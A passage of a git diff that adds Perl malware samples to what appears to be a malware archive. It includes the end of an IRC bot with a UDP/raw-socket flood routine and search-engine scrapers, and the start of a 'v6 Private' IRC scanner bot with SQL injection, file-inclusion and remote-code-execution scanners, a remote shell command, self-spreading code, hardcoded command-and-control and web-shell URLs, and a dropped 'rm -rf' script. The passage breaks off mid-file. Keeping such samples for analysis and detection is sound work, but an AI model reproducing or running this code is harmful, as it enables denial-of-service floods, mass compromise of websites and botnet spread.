+$cur_time = time - $itime;
+last if $cur_time >= $ftime;
+$t="SOCK$l";
+shutdown($t,2);
+$l++;
+}
+}
+
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % AnakDompu ExPreSi Scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+
+sub udpflooder {
+my $iaddr = inet_aton($_[0]);
+my $msg = 'A' x $_[1];
+my $ftime = $_[2];
+my $cp = 0;
+my (%pacotes);
+$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
+socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
+socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
+socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
+socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
+return(undef) if $cp == 4;
+my $itime = time;
+my ($cur_time);
+while ( 1 ) {
+for (my $porta = 1;
+$porta <= 65000; $porta++) {
+$cur_time = time - $itime;
+last if $cur_time >= $ftime;
+send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
+send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
+send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
+send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
+
+
+for (my $pc = 3;
+$pc <= 255;$pc++) {
+next if $pc == 6;
+$cur_time = time - $itime;
+last if $cur_time >= $ftime;
+socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
+send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
+}
+}
+last if $cur_time >= $ftime;
+}
+return($cur_time, %pacotes);
+}
+
+sub ctcp {
+return unless $#_ == 1;
+sendraw("PRIVMSG $_[0] :\001$_[1]\001");
+}
+
+sub msg {
+return unless $#_ == 1;
+sendraw("PRIVMSG $_[0] :$_[1]");
+}
+
+sub notice {
+return unless $#_ == 1;
+sendraw("NOTICE $_[0] :$_[1]");
+}
+
+sub op {
+return unless $#_ == 1;
+sendraw("MODE $_[0] +o $_[1]");
+}
+
+sub deop {
+return unless $#_ == 1;
+sendraw("MODE $_[0] -o $_[1]");
+}
+
+sub j {
+&join(@_);
+}
+
+sub join {
+return unless $#_ == 0;
+sendraw("JOIN $_[0]");
+
+}
+sub p { part(@_);
+}
+
+sub part {
+sendraw("PART $_[0]");
+}
+
+sub nick {
+return unless $#_ == 0;
+sendraw("NICK $_[0]");
+}
+
+sub quit {
+sendraw("QUIT :$_[0]");
+}
+
+#####
+# SUBS GOOGLE
+#####
+sub googlet {
+my @dominios = ("ae","com.ar","at","com.au","be","com.br","ca","ch","cl","de","dk");
+my @country = ("AE","AR","AT","AU","BE","BR","CA","CH","CL","DE","DK");
+my @lang = ("en","es","de","nl","pt-BR","it","de","fo","sv","fr","el");
+my @lst;
+my $key=key($_[0]);
+my $c=0;
+foreach my $i (@dominios){
+my @lista = google($i,$key,$lang[$c],$country[$c]);
+push(@lst,@lista);
+$c++;
+}
+return @lst;
+}
+
+sub google(){
+my @lst;
+my $i=$_[0];
+my $key=$_[1];
+my $lang= $_[2];
+my $country =$_[3];
+for($b=0;$b<=5000;$b+=100){
+my $Go=("www.google.".$i."/search?hl=".$lang."&q=".key($key)."&num=100&start=".$b."&meta=cr%3Dcountry".$country);
+my $Res=query($Go);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /google/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# SUBS AllTheWeb
+#####
+
+sub allthewebt {
+my @lang = ("en","es","de","nl","pt-BR","it","de","fo");
+my @lst;
+my $key=key($_[0]);
+my $c=0;
+foreach my $lang (@lang){
+my @lista = alltheweb($key,$lang[$c]);
+push(@lst,@lista);
+$c++;
+}
+return @lst;
+}
+
+
+sub alltheweb(){
+my @lista;
+my $key = $_[0];
+my $lang= $_[1];
+for($b=0;$b<=500;$b+=100){
+my $alltheweb=("http://www.alltheweb.com/search?cat=web&_sb_lang=".$lang."&hits=100&q=".key($key)."&o=".$b);
+my $Res=query($alltheweb);
+while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub standard()
+{
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=1000; $i+=100)
+{
+my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
+my $Res=query($all);
+while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+#####
+# SUBS Lycos
+#####
+sub lycos(){
+my @lst;
+my $key = $_[0];
+for($b=0;$b<=1000;$b+=100){
+my $ly=("http://search.lycos.com/?query=".key($key)."&page=$av".$b);
+my $Res=query($ly);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /msn|live|google|yahoo/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# SUBS Yahoo
+#####
+sub yahoo(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=100){
+my $Ya=("http://br.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b);
+my $Res=query($Ya);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+my $k=$1;
+$k=~s/<b>//g;
+$k=~s/<\/b>//g;
+$k=~s/<wbr>//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub yahooa(){
+my @lst;
+my $key = $_[0];
+for($b=210;$b<=1000;$b+=210){
+my $Ya=("http://be.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b);
+my $Res=query($Ya);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+my $k=$1;
+$k=~s/<b>//g;
+$k=~s/<\/b>//g;
+$k=~s/<wbr>//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub yahoob(){
+my @lst;
+my $key = $_[0];
+for($b=410;$b<=1000;$b+=210){
+my $Ya=("http://us.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b);
+my $Res=query($Ya);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+my $k=$1;
+$k=~s/<b>//g;
+$k=~s/<\/b>//g;
+$k=~s/<wbr>//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub yahooc(){
+my @lst;
+my $key = $_[0];
+for($b=610;$b<=1000;$b+=210){
+my $Ya=("http://it.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b);
+my $Res=query($Ya);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+my $k=$1;
+$k=~s/<b>//g;
+$k=~s/<\/b>//g;
+$k=~s/<wbr>//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub yahood(){
+my @lst;
+my $key = $_[0];
+for($b=810;$b<=1000;$b+=210){
+my $Ya=("http://de.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b);
+my $Res=query($Ya);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+my $k=$1;
+$k=~s/<b>//g;
+$k=~s/<\/b>//g;
+$k=~s/<wbr>//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+
+#####
+# SUBS MSN
+#####
+sub msn(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=10){
+my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE");
+my $Res=query($MsN);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if($1 !~ /msn|live/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# SUBS SEARCH
+#####
+sub search(){
+my @lst;
+my $key = $_[0];
+for($b=0;$b<=1000;$b+=100){
+my $ser=("http://www.search.com/search?q=".key($key)."".$b);
+my $Res=query($ser);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /msn|live|google|yahoo/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# SUBS FireBall
+#####
+sub fireball(){
+my $key=$_[0];
+my $inizio=1;
+my $pagine=200;
+my @lst;
+my $av=0;
+while($inizio <= $pagine){
+my $fireball="http://suche.fireball.de/cgi-bin/pursuit?pag=$av&query=".key($key)."&cat=fb_loc&idx=all&enc=utf-8";
+my $Res=query($fireball);
+while ($Res=~ m/<a href=\"?http:\/\/(.+?)\//g ){
+if ($1 !~ /msn|live|google|yahoo/){
+my $k="$1/";
+my @grep=links($k);
+push(@lst,@grep);
+}}
+$av=$av+10;
+$inizio++;
+}
+return @lst;
+}
+
+#####
+# SUBS UOL
+#####
+sub uol(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=10){
+my $UoL=("http://busca.uol.com.br/www/index.html?q=".key($key)."&start=".$i);
+my $Res=query($UoL);
+while($Res =~ m/<a href=\"http:\/\/([^>\"]*)/g){
+my $k=$1;
+if($k!~/busca|uol|yahoo/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# Altavista
+#####
+sub altavista(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=10){
+my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
+my $Res=query($AlT);
+while($Res=~m/<span class=ngrn>(.+?)\//g){
+if($1 !~ /altavista/){
+my $k=$1;
+$k=~s/<//g;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+sub altavistade(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=10){
+my $AlT=("http://de.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
+my $Res=query($AlT);
+while($Res=~m/<span class=ngrn>(.+?)\//g){
+if($1 !~ /altavista/){
+my $k=$1;
+$k=~s/<//g;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+sub altavistaus(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=10){
+my $AlT=("http://us.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
+my $Res=query($AlT);
+while($Res=~m/<span class=ngrn>(.+?)\//g){
+if($1 !~ /altavista/){
+my $k=$1;
+$k=~s/<//g;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# HotBot
+#####
+sub hotbot(){
+my @lst;
+my $key = $_[0];
+for($b=0;$b<=1000;$b+=100){
+my $hot=("http://search.hotbot.de/cgi-bin/pursuit?pag=$av&query=".key($key)."&cat=hb_loc&enc=utf-8".$b);
+my $Res=query($hot);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /msn|live|google|yahoo/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+sub hotbotb(){
+my @lst;
+my $key = $_[0];
+for($b=0;$b<=1000;$b+=100){
+my $hot=("http://search.hotbot.co.uk/cgi-bin/pursuit?pag=$av&query=".key($key)."&cat=hb_loc&enc=utf-8".$b);
+my $Res=query($hot);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /msn|live|google|yahoo/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# Mamma
+#####
+sub mamma(){
+my @lst;
+my $key = $_[0];
+for($b=0;$b<=1000;$b+=100){
+my $mam=("http://www.mamma.com/Mamma?utfout=$av&qtype=0&query=".key($key)."".$b);
+my $Res=query($mam);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /msn|live|google|yahoo/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# MozBot
+#####
+sub mozbot()
+{
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=100; $i+=1){
+my $mozbot=("http://www.mozbot.fr/search?q=".key($key)."&st=int&page=".$i);
+my $Res=query($mozbot);
+while($Res =~ m/<a href=\"?http:\/\/(.+?)\" target/g){
+my $k=$1;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub mozbota()
+{
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=100; $i+=1){
+my $mozbot=("http://www.mozbot.co.uk/search?q=".key($key)."&st=int&page=".$i);
+my $Res=query($mozbot);
+while($Res =~ m/<a href=\"?http:\/\/(.+?)\" target/g){
+my $k=$1;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub mozbotb()
+{
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=100; $i+=1){
+my $mozbot=("http://www.mozbot.com/search?q=".key($key)."&st=int&page=".$i);
+my $Res=query($mozbot);
+while($Res =~ m/<a href=\"?http:\/\/(.+?)\" target/g){
+my $k=$1;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+#####
+# SUBS AOL
+#####
+sub aol(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=100;$b++){
+my $AoL=("http://search.aol.co.uk/aol/search?query=".key($key)."&page=".$b."&nt=null&ie=UTF-8");
+my $Res=query($AoL);
+while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub aola(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=59;$b+=1){
+my $AoL=("http://205.188.99.136/aol/search?query=".key($key)."&page=".$b."&count_override=20&lr=lang_en");
+my $Res=query($AoL);
+while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub aolb(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=59;$b+=1){
+my $AoL=("http://search.aol.com/aol/search?query=".key($key)."&page=".$b."&count_override=20&lr=lang_de");
+my $Res=query($AoL);
+while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub aolc(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=59;$b+=1){
+my $AoL=("http://64.12.129.44/aol/search?query=".key($key)."&page=".$b."&count_override=20&lr=lang_fr");
+my $Res=query($AoL);
+while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+#####
+# SUBS ASK
+#####
+sub ask(){
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=1000; $i+=10)
+{
+my $Ask=("http://it.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all");
+my $Res=query($Ask);
+while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){
+my $k=$3;
+$k=~s/[\"\ ]//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub aska(){
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=1000; $i+=10)
+{
+my $Ask=("http://uk.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all");
+my $Res=query($Ask);
+while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){
+my $k=$3;
+$k=~s/[\"\ ]//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub askb(){
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=1000; $i+=10)
+{
+my $Ask=("http://de.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all");
+my $Res=query($Ask);
+while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){
+my $k=$3;
+$k=~s/[\"\ ]//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub links()
+{
+my @l;
+my $link=$_[0];
+my $host=$_[0];
+my $hdir=$_[0];
+$hdir=~s/(.*)\/[^\/]*$/\1/;
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$host.="/";
+$link.="/";
+$hdir.="/";
+$host=~s/\/\//\//g;
+$hdir=~s/\/\//\//g;
+$link=~s/\/\//\//g;
+push(@l,$link,$host,$hdir);
+return @l;
+}
+
+sub geths(){
+my $host=$_[0];
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+return $host;
+}
+
+sub os(){
+my $sito=$_[0];
+my $Res=query($sito);
+my $type;
+my $free;
+my $str;
+while($Res=~m/<br>OSTYPE:(.+?)\<br>/g){
+$type=$1;
+}
+while($Res=~m/<br>Free:(.+?)\<br>/g){
+$free=$1;
+}
+$str=$type.",".$free;
+return $str;
+}
+
+sub key(){
+my $chiave=$_[0];
+$chiave =~ s/ /\+/g;
+$chiave =~ s/:/\%3A/g;
+$chiave =~ s/\//\%2F/g;
+$chiave =~ s/&/\%26/g;
+$chiave =~ s/\"/\%22/g;
+$chiave =~ s/,/\%2C/g;
+$chiave =~ s/\\/\%5C/g;
+return $chiave;
+}
+
+sub query($){
+my $url=$_[0];
+$url=~s/http:\/\///;
+my $host=$url;
+my $query=$url;
+my $page="";
+$host=~s/href=\"?http:\/\///;
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$query=~s/$host//;
+if ($query eq "") {$query="/";};
+eval {
+my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
+print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+my @r = <$sock>;
+$page="@r";
+close($sock);
+};
+return $page;
+}
+
+sub unici{
+my @unici = ();
+my %visti = ();
+foreach my $elemento ( @_ )
+{
+next if $visti{ $elemento }++;
+push @unici, $elemento;
+}
+return @unici;
+}
+
+sub http_query($){
+my ($url) = @_;
+my $host=$url;
+my $query=$url;
+my $page="";
+$host =~ s/href=\"?http:\/\///;
+$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$query =~s/$host//;
+if ($query eq "") {$query="/";};
+eval {
+local $SIG{ALRM} = sub { die "1";};
+alarm 10;
+my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
+print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+my @r = <$sock>;
+$page="@r";
+alarm 0;
+close($sock);
+};
+return $page;
+}
+}
+
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By klepek_klepek			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
diff --git a/Perl/Backdoor.Perl.IRCBot.ai.txt b/Perl/Backdoor.Perl.IRCBot.ai.txt
new file mode 100644
index 00000000..efa8ae5e
--- /dev/null
+++ b/Perl/Backdoor.Perl.IRCBot.ai.txt
@@ -0,0 +1,2052 @@
+
+  #####################################################################################
+  ##                                                                                 ##
+  ##                                                                   15/06/2008    ##
+  ##  Author  : Osirys                                                               ##
+  ##  WebSite :                                                                      ##
+  ##  Contact : osirys[at]live[dot]it                                                ##
+  ##  Italian Coder                                                                  ##
+  ##                                                                                 ##
+  ##  ## IMPORTANT ##                                                                ##
+  ##   # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY          ##
+  ##   # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK !!                     ##
+  ##  ##                                                                             ##
+  ##                                                                                 ##
+  ##  Release: v6 Private                                                            ##
+  ##      After the success of the v5, I decided to code a new release :-)           ##
+  ##      This is a private script. If you have it, keep it priv8 !!!                ##
+  ##                                                                                 ##
+  ##  Features:                                                                      ##
+  ##    [+]Sql Injection Scanner (Fixed a bug which release v5 was affected)         ##
+  ##    [+]Remote File Inclusion Scanner                                             ##
+  ##    [+]Local File Inclusion Scanner                                              ##
+  ##    [+]Remote Code Execution Scanner                                             ##
+  ##    [+]Mass Scan, Google,AlltheWeb,Yahoo, Msn domains:                           ##
+  ##      .at/.com.au/.com.br/.ca/.ch/.cn/.de/.dk/.es/.fr/.it/.co.jp/.com.mx/.co.uk  ##
+  ##    [+]Integrated Shell, so you can execute commands on the server               ##
+  ##    [+]Security Mode to protect "dangerous" functions                            ##
+  ##    [+]Spread Mode, to activate or disable Spread Function                       ##
+  ##    [+]Single Spread Mode, to spread on RFI vulnerable sites                     ##
+  ##    [+]Bypass Engines ON: Google, Yahoo                                          ##
+  ##    !: To "bypass" these engines, the Scanner just looks for websites on other   ##
+  ##    engines that use the same bots than the main ones                            ##
+  ##                                                                                 ##
+  #####################################################################################
+
+
+use IO::Socket::INET;
+use HTTP::Request;
+use LWP::UserAgent;
+
+#######################################################
+## CONFIGURATION                                     //
+#######################################################
+
+$auth = "Osirys";
+$authmail = "osirys\@live.it";
+my $id    = "http://afe.la/id.txt?";               #Your RFI Response
+my $shell = "http://web4cc.t35.com/c99.txt?";                                  #Shell printed on the Vulnerable Site
+my $ircd  = "afro.hitmanslife.net";                                                  #Irc-Server
+my $port  = "6667";                                                           #Irc-Server Port
+my $chan1 = "#achap";                                                          #Chan for Scan
+my $chan2 = "#achap";                                                          #Results will be printed here too
+my $nick  = "ashraf|".int(rand(99))."[xx]";                                                      #Nick
+my @admins = ("b");
+my $sqlpidpr0c = 1; # This is the number of sites that the bot will test in the same time. For an accurated scann, it's reccomended to set a low number(1) 
+# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites. Unless you will see the bot exiting by an excess flood!
+# Instead, if you are scaning on old bugs, so not many results, you can put a higher number, so more speed.
+my $rfipidpr0c = 50;
+
+### USEFULL OPTIONS ( 0 => OFF  ;  1 => ON )
+
+my $spread = "http://afe.la/b?";
+
+my $spreadACT   = 0; #0 ->disabled, 1 ->enabled
+my $securityACT = 0; #0 ->disabled, 1 ->enabled
+&cheek();
+my $killpwd   = "lol"; #Password to Kill the Bot
+my $chidpwd   = "lol"; #Password to change the RFI Response
+my $cmdpwd    = "achap123"; #Password to execute commands on the server
+my $secpwd    = "achap123"; #Passowrd to enable/disable the Security Mode
+my $spreadpwd = "achap123"; #Passowrd to enable/disable the Spread Mode
+
+my $badspreadpwd != $spreadpwd;
+my $badkillpwd   != $killpwd;
+my $badidpwd     != $chidpwd;
+my $badcmdpwd    != $cmdpwd;
+my $badsecpwd    != $secpwd;
+
+#######################################################
+## END OF CONFIGURATION                              //
+#######################################################
+
+$k= 0;
+print q{
+------------------------------------------------
+         __   ___
+   __ __/ /  / __| __ __ _ _ _  _ _  ___ _ _
+   \ V / _ \ \__ \/ _/ _` | ' \| ' \/ -_) '_|
+    \_/\___/ |___/\__\__,_|_||_|_||_\___|_|
+
+------------------------------------------------
+[+] Coded by Osirys
+[+] Contact: osirys[at]live[it]
+[+] Keep it private !
+[+] *New release, more fun ;)
+[+] *Updated to: 18/06/2008
+
+};
+
+open($f1le, ">", "rm.txt");
+print $f1le "\#!/usr/bin/perl\n";
+print $f1le "exec(\"rm -rf \*siti\* && rm rm.txt\")\;\n";
+close $f1le;
+
+@help = (
+"15,1[!] 9,1!response 15,1 > 11,1Test if the RFI Response is working",
+"15,1[*] 9,1!chid <new rfi-id> 15,1 > 11,1Change the RFI-Response",
+"15,1[*] 9,1!killme 15,1 > 11,1KILL The Bot",
+"15,1[!] 9,1!milw0rm rss 15,1 > 11,1Get the last Milw0rm bugs",
+"15,1[!] 9,1!new rfi bugs 15,1 > 11,1Get the last 10 RFI bugs",
+"15,1[!] 9,1!new lfi bugs 15,1 > 11,1Get the last 10 LFI bugs",
+"15,1[!] 9,1!new sql bugs 15,1 > 11,1Get the last 10 SQL Injection bugs",
+"15,1[!] 9,1!new rce bugs 15,1 > 11,1Get the last 10 RCE bugs",
+"15,1[!] 9,1!rfi <bug> <dork> -p <sites/proc> 15,1 > 11,1Start the RFI Scanner",
+"15,1[!] 9,1!lfi <bug> <dork> 15,1 > 11,1Start the LFI Scanner",
+"15,1[!] 9,1!sql <bug> <dork> -p <sites/proc> 15,1 > 11,1Start the SQL Injection Scanner",
+"15,1[!] 9,1!rce <bug> <dork> -p <sites/proc> 15,1 > 11,1Start the RCE Scanner",
+"15,1[!] 9,1!mass[rfi/lfi/sql/rce] <bug> <dork> -p <sites/proc> 15,1 > 11,1Start the Mass Scan",
+"15,1[*] 9,1!cmd <bashline> 15,1 > 11,1Gives command on the Bot's shell. Ex: (!cmd id) (!cmd uname -a)",
+"15,1[*] 9,1!sspread -s <RFI_Vuln_site> 15,1 > 11,1To spread on a vulnerable host. Ex: (!spread -s www.h.com/a.php?bug=)",
+"15,1[*] 9,1!admin add/remove <nickname> 15,1 > 11,1To add/remove a nickname to/from the admin list",
+"15,1[*] 9,1/msg $nick !Sec ON/OFF -p <pwd> 15,1 > 11,1To enable or disable Security Mode",
+"15,1[*] 9,1/msg $nick !Spread ON/OFF -p <pwd> 15,1 > 11,1To enable or disable Spread Mode",
+"15,1[!] 9,1!info 15,1 > 11,1Get infos about the Bot",
+"4,1[!!] For commands with the15,1 [*]4,1 you must be an Admin of the v6"
+);
+
+my $sys = `uname -a`;
+my $up = `uptime`;
+
+if ($spreadACT == 0) {
+    $t5 = "OFF";
+}
+elsif ($spreadACT == 1) {
+    $t5 = "ON";
+}
+
+if ($securityACT == 0) {
+    $y5 = "OFF";
+}
+elsif ($securityACT == 1) {
+    $y5 = "ON";
+}
+
+if (fork() == 0) {
+    &irc($ircd, $port, $chan1, $chan2, $nick);
+}
+else {
+    exit(0);
+}
+
+sub irc() {
+    my ($ircd, $port, $chan1, $chan2, $nick) = @_;
+    $c0n = IO::Socket::INET->new(PeerAddr => "$ircd",PeerPort => "$port",Proto => "tcp") || die "Can not connect on server!\n";
+    $c0n->autoflush(1);
+    print $c0n "NICK $nick\n";
+    print $c0n "USER soldier 8 *  : Osirys\n";
+    print $c0n "JOIN $chan1\n";
+    writ1("4,1_/9,1 V6-Private 11,1ON 7,1_>");
+    writ1("4,1й Coded by Osirys");
+    while ($line = <$c0n>) {
+
+        $k++;
+        my @word = split /\:/, $line;
+        my @words = split /\!/, $word[1];
+        my $sys = `uname -a`;
+        my $up = `uptime`;
+        @info = (
+         "9,1[i] 15,1Release : 11,1v6 -Private IrcBot",
+         "9,1[i] 15,1Author  : 11,1$auth - Italian coder",
+         "9,1[i] 15,1Contact : 11,1$authmail",
+         "9,1[i] 15,1Uname -a: 11,1$sys",
+         "9,1[i] 15,1Uptime  : 11,1$up",
+         "9,1[i] 15,1Spread Mode: 11,1$t5",
+         "9,1[i] 15,1Security Mode: 11,1$y5"
+        );
+
+        if ($spreadACT == 0) {
+            $t5 = "OFF";
+        }
+        elsif ($spreadACT == 1) {
+            $t5 = "ON";
+        }
+
+        if ($securityACT == 0) {
+            $y5 = "OFF";
+        }
+        elsif ($securityACT == 1) {
+            $y5 = "ON";
+        }
+
+
+        if ($line =~ /^PING \:(.*)/) {
+            print $c0n "PONG :$1";
+        }
+        if ($line =~ /001/) {
+            print $c0n "JOIN $chan1\n";
+        }
+        if ($line =~ /PRIVMSG $chan1 :!help/) {
+            &help();
+        }
+        if ($line =~ /PRIVMSG $chan1 :!info/){
+            &info();
+        }
+        if ($line =~ /PRIVMSG $chan1 :!response/) {
+            &response();
+        }
+        if ($line =~ /PRIVMSG $chan1 :!milw0rm rss/) {
+            &milw0rm();
+        }
+        if ($line =~ /PRIVMSG $chan1 :!new ([a-z]{3}) bug/) {
+            &bug_update($1);
+        }
+        if (($line =~ /PRIVMSG $chan1 :!chid\s+(.*)/)&&($securityACT == 0)) {
+            &chid($words[0],$1);
+        }
+        if (($line =~ /PRIVMSG $nick :!chid\s+(.*) -p $chidpwd/)&&($securityACT == 1)) {
+            &chid($words[0],$1,"a");
+        }
+        elsif (($line =~ /PRIVMSG $nick :!chid\s+(.*) -p $badidpwd/)&&($securityACT == 1)) {
